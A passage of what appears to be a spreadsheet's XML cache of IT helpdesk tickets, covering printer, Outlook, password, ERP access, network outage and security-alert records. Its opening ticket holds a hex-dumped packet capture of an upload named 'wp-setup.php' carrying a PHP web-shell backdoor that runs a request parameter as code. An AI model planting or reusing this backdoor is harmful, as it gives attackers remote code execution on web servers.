4d6f 7a69 6c6c er-agent:.mozill_x000d__x000a_000110 612f 352e 3020 2857 696e 646f 7773 204e a/5.0.(windows.n_x000d__x000a_000120 5420 362e 313b 2072 763a 3334 2e30 2920 t.6.1;.rv:34.0)._x000d__x000a_000130 4765 636b 6f2f 3230 3130 3031 3031 2046 gecko/31211212.f_x000d__x000a_000140 6972 6566 6f78 2f33 342e 300d 0a43 6f6e irefox/34.0..con_x000d__x000a_000150 6e65 6374 696f 6e3a 206b 6565 702d 616c nection:.keep-al_x000d__x000a_000160 6976 650d 0a43 6f6e 7465 6e74 2d54 7970 ive..content-typ_x000d__x000a_000170 653a 206d 756c 7469 7061 7274 2f66 6f72 e:.multipart/for_x000d__x000a_000180 6d2d 6461 7461 3b20 626f 756e 6461 7279 m-data;.boundary_x000d__x000a_000190 3d62 6137 3333 3661 3437 6631 3634 3864 =ba7336a47f1648d_x000d__x000a_0001a0 6339 3235 3565 6235 3935 3130 6536 6630 c9255eb59510e6f0_x000d__x000a_0001b0 320d 0a0d 0a2d 2d62 6137 3333 3661 3437 2....--ba7336a47_x000d__x000a_0001c0 6631 3634 3864 6339 3235 3565 6235 3935 f1648dc9255eb595_x000d__x000a_0001d0 3130 6536 6630 320d 0a43 6f6e 7465 6e74 10e6f02..content_x000d__x000a_0001e0 2d44 6973 706f 7369 7469 6f6e 3a20 666f -disposition:.fo_x000d__x000a_0001f0 726d 2d64 6174 613b 206e 616d 653d 2266 rm-data;.name=&quot;f_x000d__x000a_000200 696c 6522 3b20 6669 6c65 6e61 6d65 3d22 ile&quot;;.filename=&quot;_x000d__x000a_000210 7770 2d73 6574 7570 2e70 6870 220d 0a43 wp-setup.php&quot;..c_x000d__x000a_000220 6f6e 7465 6e74 2d54 7970 653a 2074 6578 ontent-type:.tex_x000d__x000a_000230 742f 706c 6169 6e0d 0a0d 0a3c 3f70 6870 t/plain....&lt;?php_x000d__x000a_000240 2069 6620 2821 6973 7365 7428 245f 5245 .if.(!isset($_re_x000d__x000a_000250 5155 4553 545b 2765 3531 6527 5d29 2920 quest['e51e']))._x000d__x000a_000260 6865 6164 6572 2822 4854 5450 2f31 2e30 header(&quot;http/1.0_x000d__x000a_000270 2034 3034 204e 6f74 2046 6f75 6e64 2229 .404.not.found&quot;)_x000d__x000a_000280 3b20 4070 7265 675f 7265 706c 6163 6528 ;.@preg_replace(_x000d__x000a_000290 272f 282e 2a29 2f65 272c 2040 245f 5245 '/(.*)/e',.@$_re_x000d__x000a_0002a0 5155 4553 545b 2765 3531 6527 5d2c 2027 quest['e51e'],.'_x000d__x000a_0002b0 2729 3b20 3f3e 0d0a 2d2d 6261 3733 3336 ');.?&gt;..--ba7336_x000d__x000a_0002c0 6134 3766 3136 3438 6463 3932 3535 6562 a47f1648dc9255eb_x000d__x000a_0002d0 3539 3531 3065 3666 3032 2d2d 0d0a 59510e6f02--.._x000d__x000a_==pcap 1 hex e=="/>
    <s v="ugyothfz ugrmkdhx"/>
    <x v="19"/>
  </r>
  <r>
    <s v="unable to connect to network printer"/>
    <s v="unable to connect to network printer dv06 "/>
    <s v="ulmctsvi lbvrdika"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need access to exchange server on new company iphone"/>
    <s v="i am being blocked from exchange activesync and need access to it.  i just received a new company i6._x000d__x000a__x000d__x000a_"/>
    <s v="strzxuav ojhtmkyq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="HostName_480 - verify filesystem h:"/>
    <s v="dsw in31864001_x000d__x000a__x000d__x000a_event id: 67771149_x000d__x000a_event summary: [hw] filesystem near capacity - h:_x000d__x000a_source ip: 39.48.23.356_x000d__x000a_destination ip: _x000d__x000a_device ip: 39.48.23.356_x000d__x000a_device name: 39.48.23.356_x000d__x000a_event extra data:_x000d__x000a_inspectorruleid = 878981_x000d__x000a_vendorclassification = none_x000d__x000a_sherlockruleid = 566361_x000d__x000a_logformat = mswineventlog_x000d__x000a_windowseventid = 2013_x000d__x000a_srchostname = HostName_480_x000d__x000a_ctainstanceid = 0_x000d__x000a_username = n/a_x000d__x000a_vendorpriority = 1_x000d__x000a_logsource = system_x000d__x000a_hostname = HostName_480.company.company.com_x000d__x000a_type = warning_x000d__x000a_inspectoreventid = 529254549_x000d__x000a_ileatdatacenter = true_x000d__x000a_ontologystring = ms-system-srv-2013_x000d__x000a_foreseemaliciouscomment = null or empty model found_x000d__x000a_foreseeinternalip = 39.48.23.356_x000d__x000a_group = mswineventlog_x000d__x000a_logtimestamp = 2562437122_x000d__x000a_agentid = 113550_x000d__x000a_foreseeconndirection = internal_x000d__x000a__x000d__x000a_"/>
    <s v="afkstcev utbnkyop"/>
    <x v="38"/>
  </r>
  <r>
    <s v="re: deployment notification | telephony_software 2016"/>
    <s v="_x000a__x000a_received from: vetkdblx.nsuwkraj@gmail.com_x000a__x000a_daghyunny,_x000a__x000a_i had sent deployment notification last week with the target list. deployment was scheduled at 10:00 am in the morning, please find the attached email copy for your reference._x000a_if you would have had any concerns in "/>
    <s v="vetkdblx nsuwkraj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="tastatur an r246 und r247 defekt."/>
    <s v="tastatur an r246 und r247 defekt. bitte austauschen. (einzelne tasten funktionieren nicht mehr)"/>
    <s v="frzjtmyk wzacvhki"/>
    <x v="32"/>
  </r>
  <r>
    <s v="repeat outbound connection for 135/tcp"/>
    <s v="dsw ticket in33417637_x000d__x000a__x000d__x000a_we are seeing your 80.71.06.702/company-european-asa.company.com-1 device generating a high volume of 'repeat outbound connection for 135/tcp' alerts for traffic (blocked) from edml8111119/10.16.143.221 to port 135/tcp (remote procedure call (rpc)) of external host 31.199.53.9. this may indicate a misconfiguration, where the firewall is blocking traffic to a legitimate server/application. this may also indicate a compromised host reaching out to a malicious host or propagating worm code._x000d__x000a__x000d__x000a_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full escalation for windows login failure alerts (explicit notification via a high priority ticket and a phone call)_x000d__x000a_2) automatically resolve windows login failure alerts directly to the portal (no explicit notification but events will be available for reporting purposes in the portal)_x000d__x000a__x000d__x000a_"/>
    <s v="afkstcev utbnkyop"/>
    <x v="19"/>
  </r>
  <r>
    <s v="event summary: [hw] service icmp/icmp is down"/>
    <s v="dsw ticket in33426117_x000d__x000a__x000d__x000a_event id: 80657337_x000d__x000a_event summary: [hw] service icmp/icmp is down_x000d__x000a_source ip: 10.44.86.12_x000d__x000a_source hostname: ap-f5_x000d__x000a_destination hostname: _x000d__x000a_device ip: 10.44.86.12_x000d__x000a_device name: ap-f5.company.com_x000d__x000a_event extra data:_x000d__x000a_inspectorruleid = 2132464_x000d__x000a_sherlockruleid = 566281_x000d__x000a_ileatdatacenter = true_x000d__x000a_srchostname = ap-f5_x000d__x000a_foreseemaliciouscomment = null or empty model found;evaluationmodels-&gt;808333:0.5001:0.0061|ngm:0.9619:0.0008;_x000d__x000a_foreseeinternalip = 10.44.86.12_x000d__x000a_irreceivedtime = 1469623856316_x000d__x000a_foreseeconndirection = internal_x000d__x000a_inspectoreventid = 860011815_x000d__x000a__x000d__x000a__x000d__x000a_occurrence count: 1_x000d__x000a_event count: 1_x000d__x000a__x000d__x000a_event detail:_x000d__x000a_from 46.45.62.5144 for device 10.44.86.12 summary: service icmp/icmp is down_x000d__x000a_detail: service check failed! (100% failures)_x000d__x000a_(icmp-echo) unable to ping 10.44.86.12"/>
    <s v="afkstcev utbnkyop"/>
    <x v="19"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1953b"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1953b at 08/16/16 12:26:27"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="5"/>
  </r>
  <r>
    <s v="event summary: [hw] service icmp/icmp is down"/>
    <s v="dsw ticket in33575214_x000d__x000a__x000d__x000a_related events: _x000d__x000a_event id: 91538192_x000d__x000a_event summary: [hw] service icmp/icmp is down_x000d__x000a_occurrence count: 2_x000d__x000a_event count: 1_x000d__x000a__x000d__x000a_host and connection information_x000d__x000a_source ip: 23.43.93.645_x000d__x000a_source hostname: HostName_67_x000d__x000a_connection directionality: internal_x000d__x000a__x000d__x000a_device information_x000d__x000a_device ip: 23.43.93.645_x000d__x000a_device name: HostName_67.company.company.com_x000d__x000a__x000d__x000a_scwx event processing information_x000d__x000a_sherlock rule id (sle): 566281_x000d__x000a_inspector rule id: 2132464_x000d__x000a_inspector event id: 877864930_x000d__x000a__x000d__x000a_event detail:_x000d__x000a_from 46.45.62.5144 for device 23.43.93.645 summary: service icmp/icmp is down_x000d__x000a_detail: service check failed! (100% failures)_x000d__x000a_(icmp-echo) unable to ping 23.43.93.645"/>
    <s v="afkstcev utbnkyop"/>
    <x v="19"/>
  </r>
  <r>
    <s v="event summary: [hw] service icmp/icmp is down"/>
    <s v="dsw ticket number in33575471_x000d__x000a__x000d__x000a_related events: _x000d__x000a_event id: 91530190_x000d__x000a_event summary: [hw] service icmp/icmp is down_x000d__x000a_occurrence count: 2_x000d__x000a_event count: 1_x000d__x000a__x000d__x000a_host and connection information_x000d__x000a_source ip: 32.23.28.792_x000d__x000a_source hostname: HostName_68_x000d__x000a_connection directionality: internal_x000d__x000a__x000d__x000a_device information_x000d__x000a_device ip: 32.23.28.792_x000d__x000a_device name: HostName_68.company.company.com_x000d__x000a__x000d__x000a_scwx event processing information_x000d__x000a_sherlock rule id (sle): 566281_x000d__x000a_inspector rule id: 2132464_x000d__x000a_inspector event id: 877874632_x000d__x000a__x000d__x000a_event detail:_x000d__x000a_from 46.45.62.5144 for device 32.23.28.792 summary: service icmp/icmp is down_x000d__x000a_detail: service check failed! (100% failures)_x000d__x000a_(icmp-echo) unable to ping 32.23.28.792"/>
    <s v="afkstcev utbnkyop"/>
    <x v="19"/>
  </r>
  <r>
    <s v="HostName_68 near capacity - 90%"/>
    <s v="dsw ticket in33575516_x000d__x000a__x000d__x000a_ related events: _x000d__x000a_event id: 91530665_x000d__x000a_event summary: [hw] filesystem near capacity - h:_x000d__x000a_occurrence count: 1_x000d__x000a_event count: 1_x000d__x000a__x000d__x000a_host and connection information_x000d__x000a_source ip: 32.23.28.792_x000d__x000a_source hostname: HostName_68_x000d__x000a_connection directionality: internal_x000d__x000a__x000d__x000a_device information_x000d__x000a_device ip: 32.23.28.792_x000d__x000a_device name: HostName_68.company.company.com_x000d__x000a_log time: 2016-08-11 at 21:48:46 utc_x000d__x000a_vendor classification: none_x000d__x000a_vendor priority: 1_x000d__x000a_windows event id: 2013_x000d__x000a_type: warning_x000d__x000a_username: n/a_x000d__x000a__x000d__x000a_scwx event processing information_x000d__x000a_sherlock rule id (sle): 566279_x000d__x000a_inspector rule id: 2132464_x000d__x000a_inspector event id: 877876913_x000d__x000a_agent id: 107317_x000d__x000a__x000d__x000a_event detail:_x000d__x000a_note: by default, this alert is generated when capacity reaches 90%. (_x000d__x000a_aug 11 21:48:46 32.23.28.792 mswineventlog 1 system 1103 thu aug 11 21:48:46 2016 2013 srv n/a n/a warning HostName_68.company.company.com none  the h: disk is at or near capacity.  you may need to delete some files. 173"/>
    <s v="afkstcev utbnkyop"/>
    <x v="38"/>
  </r>
  <r>
    <s v="audio not working"/>
    <s v="_x000a_summary:sound not working on pc"/>
    <s v="obanjrhg rnafleys"/>
    <x v="0"/>
  </r>
  <r>
    <s v="sep encryption set up "/>
    <s v="sep encryption set up "/>
    <s v="epqyourg rxjipfum"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need to change the drive name of the network drives."/>
    <s v="need to change the drive name of the network drives."/>
    <s v="mkdptnhv rawxhtgz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="system performance issue"/>
    <s v="system performance issue"/>
    <s v="ugobadiz rizhbwmc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="company email accounts"/>
    <s v="from: tzrekwqf homwadbs [mailto:horst.zihrtyud@de.ibm.com] _x000d__x000a_sent: tuesday, august 16, 2016 6:04 pm_x000d__x000a_to: nwfodmhc exurcwkm_x000d__x000a_subject: amar fw: company email accounts_x000d__x000a__x000d__x000a_dear support team,_x000d__x000a__x000d__x000a_i get my company e-mail adress today for the rpo project betwenn company and ibm._x000d__x000a__x000d__x000a_cesvpmor.azgtrbow@gmail.com_x000d__x000a__x000d__x000a_it was a mis-typing. my last name is &quot;zihrtyud&quot;. can you change this please?_x000d__x000a__x000d__x000a_many "/>
    <s v="tzrekwqf homwadbs"/>
    <x v="19"/>
  </r>
  <r>
    <s v="network outage: russia - warehouse  network is down since 10:50am et on 08/16/16"/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ________10:50am et on 08/16/16_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_no_____     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   ______na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account to locked "/>
    <s v="account to locked "/>
    <s v="hexsotbv wuzrqvfc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to access ess"/>
    <s v="unable to access ess"/>
    <s v="nuqwmejc tosypckj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="multiple issues with the company guest wifi sponsor portal"/>
    <s v="we have some consultants from ca technologies visiting this week and i used the following website to provide them access to the companyguest wifi network:_x000d__x000a__x000d__x000a__x000d__x000a_i see a certificate error for this site in ie and chrome. (see attached screenshot)_x000d__x000a__x000d__x000a_i ignored the error and logged in to create a couple of accounts yesterday._x000d__x000a_given that account credentials are limited to a max of 1 day, i went in today and tried to &quot;edit&quot; the accounts to change the date for today._x000d__x000a_everything looked okay in the web app but users were not able to login._x000d__x000a__x000d__x000a_i even tried to reset the password for one of the users but that didn't help either._x000d__x000a__x000d__x000a_it is cumbersome to re-type the same info and create new accounts for each day._x000d__x000a_it would be great if the certificate issues are taken care of and accounts could be created for multiple days( or it is easier to renew passwords)_x000d__x000a_"/>
    <s v="fyuqhlcx fjiuhxae"/>
    <x v="0"/>
  </r>
  <r>
    <s v="my hana will not load anymore"/>
    <s v="_x000a__x000a_received from: nkthumgf.mwgdenbs@gmail.com_x000a__x000a_hi,_x000a_when i try to open hana now i get the follow error.  please help._x000a__x000a_[cid:image001.png@01d1f7aa.b16c2290]_x000a__x000a_nkthumgf mwgdenbs_x000a_nkthumgf.mwgdenbs@gmail.com&lt;mailto:nkthumgf.mwgdenbs@gmail.com&gt;_x000a_ph_x000a__x000a__x000a__x000a_"/>
    <s v="nkthumgf mwgdenbs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="crm mobile app queries"/>
    <s v="crm mobile app queries"/>
    <s v="ewvugfcy nxbdajgh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="re: deployment notification | telephony_software 2016"/>
    <s v="_x000d__x000a__x000d__x000a_received from: wqfzjycu.omleknjd@gmail.com_x000d__x000a__x000d__x000a_hi deeghyupak,_x000d__x000a__x000d__x000a_it seems that there has been a lack of knowledge regarding this deployment of telephony_software in israel._x000d__x000a__x000d__x000a_from the very beginning all our users apart from rabin have been working with the software in hebrew._x000d__x000a__x000d__x000a_also i am not sure deployment on telephony_software pc's all at the same time should occur in the middle of the working day._x000d__x000a__x000d__x000a_please let us know when you have a hebrew version available and then we can discuss the deployment._x000d__x000a__x000d__x000a_many "/>
    <s v="wqfzjycu omleknjd"/>
    <x v="65"/>
  </r>
  <r>
    <s v="network outage: vogelfontein,south africa,sa primary circuit company_zaf_vogelfontein_mpls_ce01 is down since 10:5am et on 08/16"/>
    <s v="what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ________10:5am et on 08/16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_yes____     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  ___no______     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   ____na_______   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    ____na_______    (yes/no/na) _x000d__x000a__x000d__x000a_10. verified site working on backup circuit ?  ___yes____     (yes/no/na) _x000d__x000a__x000d__x000a_11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    ______global_telecom_1#000000220624227 ___________________       _x000d__x000a__x000d__x000a_12. notified  gsc  ________     (yes/no/na)    cert started  ?________    (yes/no/na) _x000d__x000a__x000d__x000a_13.  additional diagnostics"/>
    <s v="dkmcfreg anwmfvlg"/>
    <x v="7"/>
  </r>
  <r>
    <s v="password reset"/>
    <s v="password reset"/>
    <s v="tahbzpsl zgoqstkv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="engineering tool not work correctly and affect multiple user for pre process area"/>
    <s v="engineering tool not work correctly and affect multiple user for pre process area_x000d__x000a_at the moment is not possible make/review cam programdntys / visualize the dwgs to make the routings and bom's and we needs review some cam files to shop floor and those issues causing stop production_x000d__x000a_the system work sometimes and other is not possible to connect_x000d__x000a_users affected = navarcm / collemc / geronca / furlaf / pintog"/>
    <s v="zuyimtsf qjtimdsp"/>
    <x v="10"/>
  </r>
  <r>
    <s v="outlook client issue."/>
    <s v="_x000a_summary:receiving following message._x000a_cannot start microsoft outlook. cannot open the outlook window. the set of folders cannot be opened. the information store could not be opened..... have &quot;restared&quot; computer several times, same result. help please"/>
    <s v="hajworze jqpisura"/>
    <x v="0"/>
  </r>
  <r>
    <s v="when working in outlook, i cannot edite the subject line of an email.  i have been able to do this until today."/>
    <s v="when working in outlook, i cannot edit the subject line of an email.  i have been able to do this until today."/>
    <s v="ijmabvlz vosuedkm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="re: deployment notification | telephony_software 2016"/>
    <s v="_x000d__x000a__x000d__x000a_received from: vetkdblx.nsuwkraj@gmail.com_x000d__x000a__x000d__x000a_hi daghyunny,_x000d__x000a__x000d__x000a_there was no issue with respect to new telephony_software application and it was deployed successfully through patching_antivirus_sw. deployment was scheduled based on the os language, which in this case was english._x000d__x000a_since we were not supporting hebrew language in the past, we deployed english language telephony_software 2016 r2 in israel pcs._x000d__x000a_csr team in israel had raised a concern that they can't work without hebrew language pack as confirmed by aofnvyzt eqiyskhm. same english package of new telephony_software application is deployed successfully for the aofnvyzt eqiyskhm and he is able to work without any issues. dyxrpmwo hcljzivn  local it from poland uninstalled new version of telephony_software and installed old telephony_software 4.0 on their pcs without informing us._x000d__x000a__x000d__x000a_to fulfill local csr team requirement we can reschedule the new telephony_software application through remote deployment and hebrew language pack can be installed manually on their pcs._x000d__x000a__x000d__x000a_"/>
    <s v="vetkdblx nsuwkraj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="wvdxnkhf jirecvta has issues to connect company wifi network in fÃ¼rth"/>
    <s v="wvdxnkhf jirecvta has issues to connect company wifi network in fÃ¼rth, and in the past two days his windows access gets suddenly locked. could someone please get in contact with him per cell phone +44 _x000a__x000a_"/>
    <s v="ugephfta hrbqkvij"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp access issue"/>
    <s v="system (SID_34, SID_37, SID_39, SID_38, hrp, other ?):SID_34_x000a__x000a_enter user id of user having the issue: kowfthyuale_x000a__x000a_transaction code(s) the user needs or was working with: vl02n_x000a__x000a_describe the issue:_x000a_during pgi goods receipt eva is getting an error. iÂ´m attaching the su53 screenshot. the sales order was manually moved to plant_263._x000a__x000a_if you are getting a &quot;not authorized&quot; message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket._x000a__x000a_provide access the same as this other user:"/>
    <s v="kmtpzyre mqlsfkre"/>
    <x v="19"/>
  </r>
  <r>
    <s v="erp SID_34 lock out."/>
    <s v="erp SID_34 lock out."/>
    <s v="szpilhug hrwacxbk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset"/>
    <s v="password reset"/>
    <s v="kauozcir jlyqxise"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook not working : crm issue "/>
    <s v="outlook not working : crm issue "/>
    <s v="tjyoheic eyuwsgld"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype personal certificate issue "/>
    <s v="skype personal certificate issue "/>
    <s v="tjyoheic eyuwsgld"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_37 account unlock and password reset"/>
    <s v="erp SID_37 account unlock and password reset"/>
    <s v="djlpawmc nyzwqofu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="connecting drives to my computer"/>
    <s v="_x000d__x000a__x000d__x000a_received from: zxobmreq.udikorhv@gmail.com_x000d__x000a__x000d__x000a_it,_x000d__x000a_connecting drives to my computer is done by it, or is there a function to connect that you can do yourself?_x000d__x000a__x000d__x000a_ierfgayt alwjivqg needs drive â€“ teams (\\HostName_847&lt;file:///\\HostName_847&gt;) (s:) connection._x000d__x000a_"/>
    <s v="zxobmreq udikorhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="circuit outage: usa - (company) secondary circuit company-usa-vpn-rtr is down since 9:15 am et on 08/16/16"/>
    <s v="what type of outage:  _____network     ___x__circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____yes_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _________9:15 am et on 08/16/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yes___    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   ___yes_____     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   ____na_______   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    _____no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dkmcfreg anwmfvlg"/>
    <x v="7"/>
  </r>
  <r>
    <s v="engineering_tool"/>
    <s v="name:obanjrhg rnafleys_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:obanjrhg.rnafleys@gmail.com_x000a_customer number:_x000a_telephone:+44 _x000a_summary:access to the engineering_tool system"/>
    <s v="obanjrhg rnafleys"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: SID_32hotf"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: SID_32hotf at 08/16/16 09:33:31"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="1"/>
  </r>
  <r>
    <s v="this message was sent to the company quarantine database. please contact company it help desk for more information"/>
    <s v="from: microsoft outlook [mailto:postmaster@company.onmicrosoft.com] _x000d__x000a_sent: monday, august 15, 2016 7:51 pm_x000d__x000a_to: vhzxkjet lkufgrhq_x000d__x000a_subject: notification: fw: outstanding inwarehouse_tool payment_x000d__x000a__x000d__x000a_this message was sent to the company quarantine database. please contact company it help desk for more information. _x000d__x000a_"/>
    <s v="vhzxkjet lkufgrhq"/>
    <x v="26"/>
  </r>
  <r>
    <s v="unable to connect to companysecure at usa, oh"/>
    <s v="contact # _x000a_no one at the site is able to connect to companysecure"/>
    <s v="zcxfngeq gwczibrq"/>
    <x v="3"/>
  </r>
  <r>
    <s v="not possible to complete to do pgi for rma 7112500109- del 9168048239- td - erro cost center"/>
    <s v="during the pgi transaction for rma 7112500109 -  delivery  9168048239 - customer 81295213 ( robhyertyjo tadeu)  and 7112500108 - delivery 9168017962- customer 81295213 ( robhyertyjo tadeu)   we are facing error - cost center 1company/par001 blocked against direct postings on 16.08.2016 / cost center par001, controlling area 1company is locked for primary postings on 16.08.2016. the erp system automatically determined controlling area 1company from the company code (and business area). _x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="jaeuqbvt orlhenfj"/>
    <x v="43"/>
  </r>
  <r>
    <s v="issues with attachments on outlook "/>
    <s v="issues with attachments on outlook "/>
    <s v="seygxbva shqjbzpf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="wnyeczkb.eqpjcukv@gmail.com password reset"/>
    <s v="wnyeczkb.eqpjcukv@gmail.com password reset"/>
    <s v="ughzilfm cfibdamq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vpn queries"/>
    <s v="vpn queries"/>
    <s v="fgejnhux fnkymoht"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_37 password reset"/>
    <s v="erp SID_37 password reset"/>
    <s v="liedzaft lvnbzktj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="access to engineering_tool"/>
    <s v="_x000a_summary:job transfer back into markhtyeting and i am requesting access to the engineering_tool (tool performance reporting) system."/>
    <s v="fljhvdsn kiyzclao"/>
    <x v="0"/>
  </r>
  <r>
    <s v="call transferred to dan"/>
    <s v="call transferred to dan"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to the hp printer at home"/>
    <s v="unable to connect to the hp printer at home"/>
    <s v="lukibasy bqufyozk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need access to benefit solver in single sign on portal"/>
    <s v="user called in stating that she needs the benefit solver app in single sign on portal._x000a_checked in ad and didn't find that particular group added to user id. please help check and do the needful._x000a__x000a_contact no - _x000a_user id - reddfgymos"/>
    <s v="mabstwkd ytmuwicv"/>
    <x v="19"/>
  </r>
  <r>
    <s v="browser issue : "/>
    <s v="_x000d__x000a_"/>
    <s v="fgejnhux fnkymoht"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vip 2 - single sign on for hr_tool is not operating"/>
    <s v="i cannot access hr_tool globalview for my pay check each time i go to the sso i get this message when i open the hr_tool icon_x000d__x000a_&quot;sorry, your access is denied.  please contact your system administrator.&quot;_x000d__x000a_"/>
    <s v="buyoipdj fceymwtz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="install ie11 \ahlqgjwx wbsfavhg"/>
    <s v="install ie11 \ahlqgjwx wbsfavhg"/>
    <s v="ahlqgjwx wbsfavhg"/>
    <x v="24"/>
  </r>
  <r>
    <s v="probleme mit lan  \wxstfouy isjzcotm"/>
    <s v="probleme mit lan  \wxstfouy isjzcotm"/>
    <s v="wxstfouy isjzcotm"/>
    <x v="24"/>
  </r>
  <r>
    <s v="unable to create delivery"/>
    <s v="please provide the following:_x000d__x000a__x000d__x000a_what order number? 1135584771/000020 + 5018821007/00001 + 5018981964/00001_x000d__x000a__x000d__x000a_what material or item number?  3730375 + 7316410_x000d__x000a__x000d__x000a_what warehouse location? plant_108_x000d__x000a__x000d__x000a_issue description / error message? nothing happens - no message"/>
    <s v="vdylwkbo hzlnrgat"/>
    <x v="5"/>
  </r>
  <r>
    <s v="after upgrade telephony_software has dierppeared from the screen"/>
    <s v="after upgrade telephony_software has dierppeared from the screen"/>
    <s v="zkgfcyvx sgxeatyb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="access to forecast to plan"/>
    <s v="access to forecast to plan"/>
    <s v="nwzhlktu plktredg"/>
    <x v="22"/>
  </r>
  <r>
    <s v="probleme mit Ã¶ffnen von dokumenten im intranet mit internet explorer . \xmlbfjpg yegzbvru"/>
    <s v="probleme mit Ã¶ffnen von dokumenten im intranet mit internet explorer . \xmlbfjpg yegzbvru"/>
    <s v="xmlbfjpg yegzbvru"/>
    <x v="24"/>
  </r>
  <r>
    <s v="single sign on portal apps"/>
    <s v="please add the purchasing production and purchasing uacyltoe hxgaycze app to qiyujevw ogadikxv's single sign on portal. she is unable to view and enter purchasing this way. she is a member of purchasing and should have access to it. "/>
    <s v="zqordbct lnspykfu"/>
    <x v="27"/>
  </r>
  <r>
    <s v="company guest account creation request "/>
    <s v="_x000a_summary:can you please help me with the company guest wifi logon info?"/>
    <s v="vfrdxtqw jfbmsenz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset"/>
    <s v="password reset"/>
    <s v="fegczbtq mkraueci"/>
    <x v="0"/>
  </r>
  <r>
    <s v="problems with accessing quote engine within company centre"/>
    <s v="i logged onto to company centre_x000d__x000a_then searched for a part#_x000d__x000a_then clicked on the configure button_x000d__x000a_this would normally start the quote engine_x000d__x000a__x000d__x000a_instead, receiving the following error (attached)"/>
    <s v="obanjrhg rnafleys"/>
    <x v="21"/>
  </r>
  <r>
    <s v="unable to update password on password_management_tool password manager"/>
    <s v="unable to update password on password_management_tool password manager"/>
    <s v="ewvugfcy nxbdajgh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp pw is invalid"/>
    <s v="_x000d__x000a__x000d__x000a_received from: qnzmjxsl.logsrwnb@gmail.com_x000d__x000a__x000d__x000a_dear all,_x000d__x000a_pls. give me authority to reset my erp pw.  "/>
    <s v="qnzmjxsl logsrwnb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to generate inwarehouse_tool as per delivery# 8057901657"/>
    <s v="unable to generate inwarehouse_tool as per delivery# 9168012768, we've got the error message ie. bapi_po_create fail: material auto extend failed, please help fix this error and advise back to us.  then, we will generate tax inwarehouse_tool at our end, "/>
    <s v="tqfnalpj qyoscnge"/>
    <x v="12"/>
  </r>
  <r>
    <s v="HostName_1045:(reporting_engineering_tooling - production): drive e is 88% full."/>
    <s v="reporting_tool alert: average (4 samples) disk free on e:\ is now 12%, which is below the warning threshold (15%) out of total size 350.0 gb"/>
    <s v="mnlazfsr mtqrkhnx"/>
    <x v="8"/>
  </r>
  <r>
    <s v="erp SID_34 account lock out issue "/>
    <s v="erp SID_34 account lock out issue "/>
    <s v="kexcsbgw lzabjxwf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="phone issues"/>
    <s v="phone issues"/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="bitte um ein ruckruf"/>
    <s v="_x000a__x000a_received from: zkgfcyvx.sgxeatyb@gmail.com_x000a_ danke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a_[#+company/posts&gt;  [_x000a_select the following link to view the disclaimer in an alternate language. "/>
    <s v="zkgfcyvx sgxeatyb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook is giving stack guard error."/>
    <s v="outlook is giving stack guard error."/>
